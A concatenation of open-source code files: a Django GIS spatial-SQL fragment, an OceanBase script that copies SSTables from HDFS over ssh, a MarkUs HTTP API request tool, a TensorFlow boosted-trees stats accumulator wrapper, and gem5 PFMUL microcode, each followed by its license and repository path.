def __init__(self, function='', operator='', result='', **kwargs):
self.function = function
self.operator = operator
self.result = result
self.extra = kwargs
def as_sql(self, geo_col, geometry='%s'):
return self.sql_template % self.params(geo_col, geometry)
def params(self, geo_col, geometry):
params = {'function' : self.function,
'geo_col' : geo_col,
'geometry' : geometry,
'operator' : self.operator,
'result' : self.result,
}
params.update(self.extra)
return params
class SpatialFunction(SpatialOperation):
"""
Base class for generating spatial SQL related to a function.
"""
sql_template = '%(function)s(%(geo_col)s, %(geometry)s)'
def __init__(self, func, result='', operator='', **kwargs):
# Getting the function prefix.
default = {'function' : func,
'operator' : operator,
'result' : result
}
kwargs.update(default)
super(SpatialFunction, self).__init__(**kwargs)
|
bsd-3-clause
|
Eward5513/oceanbase
|
oceanbase_0.4/script/data_dispatcher/copy_sstable.py
|
13
|
7762
|
#!/usr/bin/python2.6
import os
import sys
import Queue
import threading
from subprocess import Popen, PIPE, STDOUT
import copy
import time
import re
import logging
class ExecutionError(Exception): pass
class Shell:
@classmethod
def sh(cls, cmd, host=None, username=None):
'''Execute a command locally or remotely
>>> Shell.sh('ls > /dev/null')
0
>>> Shell.sh('ls > /dev/null', host='10.232.36.29')
0
'''
if host is not None:
if username is not None:
cmd = "ssh {username}@{host} '{cmd}'".format(**locals())
else:
cmd = "ssh {host} '{cmd}'".format(**locals())
ret = os.system(cmd)
if ret != 0:
err_msg = 'Shell.sh({0}, host={1})=>{2}\n'.format(
cmd, host, ret);
sys.stderr.write(err_msg)
raise ExecutionError(err_msg)
else:
logging.debug('"{0}" Execute SUCCESS'.format(cmd))
return ret
@classmethod
def popen(cls, cmd, host=None, username=None):
'''Execute a command locally, and return
>>> Shell.popen('ls > /dev/null')
''
'''
if host is not None:
if username is not None:
cmd = "ssh {username}@{host} '{cmd}'".format(**locals())
else:
cmd = "ssh {host} '{cmd}'".format(**locals())
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT)
output = p.communicate()[0]
err = p.wait()
if err:
output = 'Shell.popen({0})=>{1} Output=>"{2}"'.format(cmd, err, output)
raise ExecutionError(output)
return output
@classmethod
def scp(cls, src, host, dst, username=None):
'''remote copy
>>> Shell.scp('build1.py', '10.232.36.29', '')
0
'''
if username is not None:
cmd = 'scp {0} {1}@{2}:{3}'.format(src, username, host, dst)
else:
cmd = 'scp {0} {1}:{2}'.format(src, host, dst)
return Shell.sh(cmd)
@classmethod
def mkdir(cls, path, host=None):
'''make directory locally or remotely
>>> Shell.mkdir('test', host='10.232.36.29')
0
>>> Shell.mkdir('test')
0
'''
if host is None:
os.path.exists(path) or os.mkdir(path)
return 0
else:
return Shell.sh('mkdir -p {0}'.format(path), host)
class WorkerPool:
class Worker(threading.Thread):
def __init__(self, task_queue, status):
threading.Thread.__init__(self)
self.task_queue = task_queue
self.status = status
self.__stop = 0
self.err = None
def run(self):
#cwd = 'thread' + str(self.ident)
#Shell.mkdir(cwd)
while not self.__stop:
try:
task = self.task_queue.get(timeout=1)
task()
self.task_queue.task_done()
except Queue.Empty:
pass
except BaseException as e:
self.task_queue.task_done()
if self.err is None:
self.err = e
logging.error('thread' + str(self.ident) + ' ' + str(e))
if self.err is not None:
raise self.err
def stop(self):
self.__stop = True
class Status:
def __init__(self):
self.status = 0
def set_active(self):
self.status = 1
def set_idle(self):
self.status = 2
def is_idle(self):
return self.status == 2
def __init__(self, num):
self.task_queue = Queue.Queue()
self.n = num
self.status = [WorkerPool.Status() for _ in range(num)]  # one Status per worker, not shared aliases
self.workers = [None] * num
for i in range(num):
self.workers[i] = WorkerPool.Worker(self.task_queue, self.status[i]);
self.workers[i].start()
def add_task(self, task):
self.task_queue.put(task)
def all_idle(self):
for i in range(self.n):
if not self.status[i].is_idle():
return False
return True
def wait(self):
self.task_queue.join()
for w in self.workers:
w.stop()
def R(cmd, local_vars):
G = copy.copy(globals())
G.update(local_vars)
return cmd.format(**G)
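# Illustrative: R interpolates a template from the module globals plus the
# caller's locals, e.g.
#
#   tmp_dir = '/data/1/tmp'
#   R('mkdir -p {tmp_dir}', locals())   # -> 'mkdir -p /data/1/tmp'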
class GetFromHadoop:
def __init__(self, task):
'''task should be a dict with these fields:
dir
files
'''
self.task = task
def __call__(self):
dir = self.task['dir']
files = self.task['files']
for f in files:
m = re.match(r'.*/([^/]+)', f)
if m is not None:
filename = m.group(1)
dest_dir = dir
tmp_dir = R('{dest_dir}/tmp', locals())
mkdir_tmp_dir = R('mkdir -p {tmp_dir}', locals())
hadoop_get_cmd = R('{hadoop_bin_dir}hadoop fs -get {f} {tmp_dir}', locals())
commit_mv_cmd = R('mv {tmp_dir}/{filename} {dest_dir}', locals())
logging.debug(mkdir_tmp_dir)
logging.debug(hadoop_get_cmd)
logging.debug(commit_mv_cmd)
Shell.sh(mkdir_tmp_dir)
Shell.sh(hadoop_get_cmd)
Shell.sh(commit_mv_cmd)
msg = R('Successfully get "{filename}" to "{dest_dir}"', locals())
logging.info(msg)
def round_inc(n, ceiling):
n += 1
if n >= ceiling:
n = 0
return n
def DoWork():
try:
wp = WorkerPool(thread_num)
dir_num = len(data_dir_list)
tasks = []
for i in range(dir_num):
tasks.append(dict(disk_id=None, files=[]))
file_list = []
hadoop_ls_cmd = R("{hadoop_bin_dir}hadoop fs -ls {input_dir}", locals())
logging.debug(hadoop_ls_cmd)
ls_output = Shell.popen(hadoop_ls_cmd).split('\n')
for l in ls_output:
m = re.match(r'^[-d].* ([^ ]+)$', l)
if m is not None:
file_list.append(m.group(1))
logging.debug(file_list)
disk_index = 0
for f in file_list:
if f != '':
tasks[disk_index]['files'].append(f)
disk_index = round_inc(disk_index, dir_num)
for i in range(dir_num):
tasks[i]['dir'] = data_dir_list[i]
logging.debug(str(tasks[i]))
wp.add_task(GetFromHadoop(tasks[i]))
finally:
wp.wait()
def gen_list(pattern):
match = re.search(r'\[(.+)\]', pattern)
if match is None:
return [pattern]
specifier = match.group(1)
match = re.match('([0-9]+)-([0-9]+)', specifier)
if not match:
raise Exception('illformaled range specifier: %s'%(specifier))
_start, _end = match.groups()
start,end = int(_start), int(_end)
formatter = re.sub('\[.+\]', '%0'+str(len(_start))+'d', pattern)
return [formatter%(x) for x in range(start, end+1)]
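# An illustrative sketch of gen_list (not part of the original script); the
# zero padding follows the width of the range start:
#
#   gen_list('/data/[1-3]/bypass')   # -> ['/data/1/bypass', '/data/2/bypass', '/data/3/bypass']
#   gen_list('/disk[01-03]')         # -> ['/disk01', '/disk02', '/disk03']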
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-b', '--hadoop_bin_dir',
help='Hadoop bin utils directory',
dest='hadoop_bin_dir')
parser.add_option('-i', '--input_dir',
help='Input directory in HDFS',
dest='input_dir')
parser.add_option('-d', '--data_dir',
help='bypass data directory, using [1-10] pattern representing 10 disks.'
'for example: "-d /data/[1-4]/ups_data/bypass"',
dest='data_dir')
parser.add_option('-t', '--thread_num',
help='thread number to get SSTable, default is 8',
dest='thread_num')
parser.add_option('-l', '--log_level',
help='Log level: ERROR, WARN, INFO, DEBUG',
dest='log_level')
(options, args) = parser.parse_args()
if (options.hadoop_bin_dir is None
or options.input_dir is None
or options.data_dir is None):
print(parser.format_help())
parser.exit(status=1)
hadoop_bin_dir = options.hadoop_bin_dir
input_dir = options.input_dir
data_dir = options.data_dir
data_dir_list = gen_list(data_dir)
if options.thread_num is not None:
thread_num = int(options.thread_num)
else:
thread_num = 8
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
if options.log_level is not None:
level = LEVELS.get(options.log_level.lower(), logging.NOTSET)
logging.basicConfig(level=level,
format='[%(asctime)s] %(levelname)s %(message)s')
DoWork()
|
gpl-2.0
|
selyanhb/Markus
|
lib/tools/api_helper.py
|
14
|
8102
|
#!/usr/bin/python
#
# The intention of this Python script is to provide
# MarkUs users with a tool which is able to generate HTTP's
# GET, PUT, DELETE and POST requests. This may be handy for
# users planning to use MarkUs' Web API.
#
## DISCLAIMER
#
# This script is made available under the OSI-approved
# MIT license. See http://www.markusproject.org/#license for
# more information. WARNING: This script is still considered
# experimental.
#
# (c) by the authors, 2008 - 2010.
#
import httplib, urllib, sys, socket, os
from optparse import OptionParser
from urlparse import urlparse
class InvalidParameterError(Exception):
""" Custom exception class. """
def __str__(self):
return "Invalid parameter format. Expected 'param=value param=value ...'"
def check_arguments(options, args, parser):
""" Checks if arguments passed to script are plausible.
Returns a ParseResult 6-tuple if successful. """
# Make sure args list may be valid
if len(sys.argv) < 6:
print >> sys.stderr, parser.get_usage()
sys.exit(1)
# Make sure HTTP request type is provided
if options.http_request_type == None:
print >> sys.stderr, "Request type is a required option."
sys.exit(1)
# Make sure API key is provided
elif options.api_key_file == None:
print >> sys.stderr, "API key is a required option."
sys.exit(1)
# Make sure an URL to post to is provided
elif options.url == None:
print >> sys.stderr, "URL is a required option."
sys.exit(1)
# Make sure we one of the supported request types
request = options.http_request_type.upper()
if (request not in ["PUT", "POST", "GET", "DELETE"]):
print >> sys.stderr, "Bad request type. Only GET, PUT, POST, DELETE are supported."
sys.exit(1)
# Binary file option only makes sense for PUT/POST
if ( request not in ["PUT", "POST"] and
options.binary_file != None and
len(options.binary_file) != 0 ):
print >> sys.stderr, "Binary file option only allowed for PUT and POST"
sys.exit(1)
# Sanity check URL (must be http/https)
parsed_url = urlparse(options.url.strip())
if parsed_url.scheme not in ["http", "https"]:
print >> sys.stderr, "Only http and https URLs are supported."
sys.exit(1)
return parsed_url
def submit_request(options, args, parsed_url):
""" Construct desired HTTP request, including proper auth header.
Pre: check_arguments has been run, i.e. we have a proper set of
arguments.
Post: Request crafted and submitted. Response status printed to stdout. """
# Read API key from file
if not os.path.isfile(options.api_key_file.strip()):
print >> sys.stderr, "%s: File not found!" % options.api_key_file.strip()
sys.exit(1)
try:
api_key_file = open(options.api_key_file.strip(), "r")
key = api_key_file.read().strip()
api_key_file.close()
except EnvironmentError:
print >> sys.stderr, "%s: Error reading file!" % options.api_key_file.strip()
sys.exit(1)
# Construct auth header string
auth_header = "MarkUsAuth %s" % key
# Prepare header parameter for connection. MarkUs auth header, plus
# need 'application/x-www-form-urlencoded' header for parameters to go through
headers = { "Authorization": auth_header,
"Content-type": "application/x-www-form-urlencoded" }
# Prepare parameters
params = urllib.urlencode(parse_parameters(options, args))
# HTTP or HTTPS?
try:
resp = None; conn = None
if parsed_url.scheme == "http":
conn = httplib.HTTPConnection(parsed_url.netloc)
elif parsed_url.scheme == "https":
conn = httplib.HTTPSConnection(parsed_url.netloc)
else:
# Should never get here, since we checked for http/https previously
print >> sys.stderr, "Panic! Neither http nor https URL."
sys.exit(1)
conn.request(options.http_request_type.upper(), parsed_url.path, params, headers)
resp = conn.getresponse()
print resp.status, resp.reason
if options.verbose == True: # Is verbose turned on?
data = resp.read()
print data
conn.close()
except httplib.HTTPException as e: # Catch HTTP errors
print >> sys.stderr, str(e)
sys.exit(1)
except socket.error, (value, message):
if value == 111: # Connection Refused
print >> sys.stderr, "%s: %s" % (parsed_url.netloc, message)
sys.exit(1)
else:
print >> sys.stderr, "%s: %s (Errno: %s)" % (parsed_url.netloc, message, value)
sys.exit(1)
def parse_parameters(options, raw_params):
""" Parses parameters passed in as arguments and returns them as a dict. """
params = {}
if (options.test_file is not None):
# Read test content from file
if not os.path.isfile(options.test_file.strip()):
print >> sys.stderr, "%s: File not found!" % options.test_file.strip()
sys.exit(1)
try:
test_file = open(options.test_file.strip(), "r")
content = test_file.read().strip()
test_file.close()
params["file_content"] = content
except EnvironmentError:
print >> sys.stderr, "%s: Error reading file!" % options.test_file.strip()
sys.exit(1)
""" Parses parameters passed in as arguments and returns them as a dict. """
try:
for param in raw_params:
try:
ind = param.index("=") # Find first '='
name = param[:ind]
value = param[(ind+1):] # exclude '='
params[name] = value
except ValueError:
# '=' delimiter not found => Illegal format
raise InvalidParameterError()
except InvalidParameterError as e:
print >> sys.stderr, str(e)
sys.exit(1)
return params
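# A quick illustrative sketch (assuming options.test_file is None; parameter
# names here are hypothetical):
#
#   parse_parameters(options, ["group_name=A1", "filename=report.pdf"])
#   # -> {'group_name': 'A1', 'filename': 'report.pdf'}
#
# Only the first '=' splits name from value, so values may themselves
# contain '=' characters.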
def main():
""" Setup options parser and kick off functions to carry out the actual tasks """
parser = OptionParser()
# We don't want to allow interspersed options
parser.disable_interspersed_args()
# Usage string
parser.usage = "%prog -r HTTP_R -k KEY -u URL [options] [param=value param=value ...]"
parser.usage += "\n\tTry: %prog -h for more information."
# Short description
parser.description = "MarkUs utility script to generate GET, PUT, POST, "
parser.description += "DELETE HTTP requests. It automatically crafts and sends HTTP requests"
parser.description += " to the specified MarkUs API URL."
# Define script options
parser.add_option("-k", "--key", action="store", type="string",
dest="api_key_file", help="File containing your API key for MarkUs. Required.")
parser.add_option("-t", "--test-file", action="store", type="string",
dest="test_file", help="File containing your test content for MarkUs. Will be ignored if file_content='...' is provided.")
parser.add_option("-r", "--request-type", dest="http_request_type",
action="store", type="string",
help="The HTTP request type to generate. One of {PUT,GET,POST,DELETE}. Required.")
parser.add_option("-u", "--url", dest="url", action="store", type="string",
help="The url of the resource to send the HTTP request to. Required.")
parser.add_option("-b", "--binary", dest="binary_file",
action="append", type="string",
help="Path to binary file. This works only for PUT and POST.")
parser.add_option("-v", "--verbose", dest="verbose",
action="store_true",
help="Print response body in addition to the HTTP status code and reason.")
(options, args) = parser.parse_args() # Get options and rest of arguments
# Arguments checking routine
parsed_url = check_arguments(options, args, parser)
# Request submission routine
submit_request(options, args, parsed_url)
# Run script's main function if it's not imported
if __name__ == "__main__":
main()
|
mit
|
adamtiger/tensorflow
|
tensorflow/contrib/boosted_trees/python/ops/stats_accumulator_ops.py
|
62
|
9211
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stats Accumulator ops python wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.boosted_trees.python.ops import batch_ops_utils
# pylint: disable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import boosted_trees_ops_loader
# pylint: enable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import gen_stats_accumulator_ops
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import resources
from tensorflow.python.training import saver
# Pattern to remove all non alpha numeric from a string.
_PATTERN = re.compile(r"[\W_]+")
class StatsAccumulator(saver.BaseSaverBuilder.SaveableObject):
"""A resource that allows to accumulate gradients and hessians.
For consistency guarantees, we use read and write stamp tokens.
The stamp token on the resource is updated with StatsAccumulator.flush.
Calls to StatsAccumulator.add that don't provide the current stamp token are
ignored.
"""
def __init__(self,
stamp_token,
gradient_shape,
hessian_shape,
name=None,
container=None):
"""Creates a stats accumulator and returns a handle to it.
Args:
stamp_token: An int64, initial value to use for the stamp token.
gradient_shape: A TensorShape, containing shape of gradients.
hessian_shape: A TensorShape, containing shape of hessians.
name: A name for the stats accumulator variable.
container: An optional `string`. Defaults to `""`.
Returns:
A `Tensor` of type mutable `string`. The handle to the stats accumulator.
"""
if name is not None:
name = _PATTERN.sub("", name)
with ops.name_scope(name, "StatsAccumulator") as name:
# Both values are scalars.
if (gradient_shape == tensor_shape.scalar() and
hessian_shape == tensor_shape.scalar()):
self._is_scalar = True
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_scalar_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_scalar(
self._resource_handle, stamp_token)
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_scalar_is_initialized(
self._resource_handle))
else:
self._is_scalar = False
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_tensor_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_tensor(
self._resource_handle, stamp_token, gradient_shape.as_list(),
hessian_shape.as_list())
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_tensor_is_initialized(
self._resource_handle))
self._create_op = create_op
slice_spec = ""
saver_name = self._resource_handle.name
(stamp_token, num_updates, partition_ids, feature_ids, gradients,
hessians) = self.serialize()
specs = [
saver.BaseSaverBuilder.SaveSpec(stamp_token, slice_spec,
saver_name + "_stamp"),
saver.BaseSaverBuilder.SaveSpec(num_updates, slice_spec,
saver_name + "_num_updates"),
saver.BaseSaverBuilder.SaveSpec(partition_ids, slice_spec,
saver_name + "_partition_ids"),
saver.BaseSaverBuilder.SaveSpec(feature_ids, slice_spec,
saver_name + "_feature_ids"),
saver.BaseSaverBuilder.SaveSpec(gradients, slice_spec,
saver_name + "_gradients"),
saver.BaseSaverBuilder.SaveSpec(hessians, slice_spec,
saver_name + "hessians"),
]
super(StatsAccumulator, self).__init__(self._resource_handle, specs, name)
resources.register_resource(self._resource_handle, create_op,
is_initialized_op)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, self)
def add(self, stamp_token, partition_ids, feature_ids, gradients, hessians):
"""Updates the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
def schedule_add(self, partition_ids, feature_ids, gradients, hessians):
"""Schedules an update to the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_scalar_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
else:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_tensor_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
def _make_summary(self, partition_ids, feature_ids, gradients, hessians):
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_make_summary(
partition_ids, feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_make_summary(
partition_ids, feature_ids, gradients, hessians)
def deserialize(self, stamp_token, num_updates, partition_ids, feature_ids,
gradients, hessians):
"""Resets the stats accumulator with the serialized state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
def flush(self, stamp_token, next_stamp_token):
"""Flushes the stats accumulator."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_flush(
self._resource_handle, stamp_token, next_stamp_token)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_flush(
self._resource_handle, stamp_token, next_stamp_token)
def serialize(self):
"""Serializes the stats accumulator state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_serialize(
self._resource_handle)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_serialize(
self._resource_handle)
def restore(self, restored_tensors, unused_restored_shapes):
"""Restores the associated tree ensemble from 'restored_tensors'.
Args:
restored_tensors: the tensors that were loaded from a checkpoint.
unused_restored_shapes: the shapes this object should conform to after
restore. Not meaningful for trees.
Returns:
The operation that restores the state of the tree ensemble variable.
"""
with ops.control_dependencies([self._create_op]):
return self.deserialize(
stamp_token=restored_tensors[0],
num_updates=restored_tensors[1],
partition_ids=restored_tensors[2],
feature_ids=restored_tensors[3],
gradients=restored_tensors[4],
hessians=restored_tensors[5])
def resource(self):
return self._resource_handle
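# A rough usage sketch (illustrative only; method names and shapes are taken
# from the class above, while the input tensors are hypothetical):
#
#   from tensorflow.python.framework import tensor_shape
#   acc = StatsAccumulator(
#       stamp_token=0,
#       gradient_shape=tensor_shape.scalar(),
#       hessian_shape=tensor_shape.scalar())
#   update_op = acc.add(0, partition_ids, feature_ids, gradients, hessians)
#   flush_op = acc.flush(stamp_token=0, next_stamp_token=1)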
|
apache-2.0
|
HwisooSo/gemV-update
|
src/arch/x86/isa/insts/simd64/floating_point/arithmetic/multiplication.py
|
91
|
2452
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop PFMUL_MMX_MMX {
mmulf mmx, mmx, mmxm, size=4, ext=0
};
def macroop PFMUL_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
mmulf mmx, mmx, ufp1, size=4, ext=0
};
def macroop PFMUL_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
mmulf mmx, mmx, ufp1, size=4, ext=0
};
'''
|
bsd-3-clause
|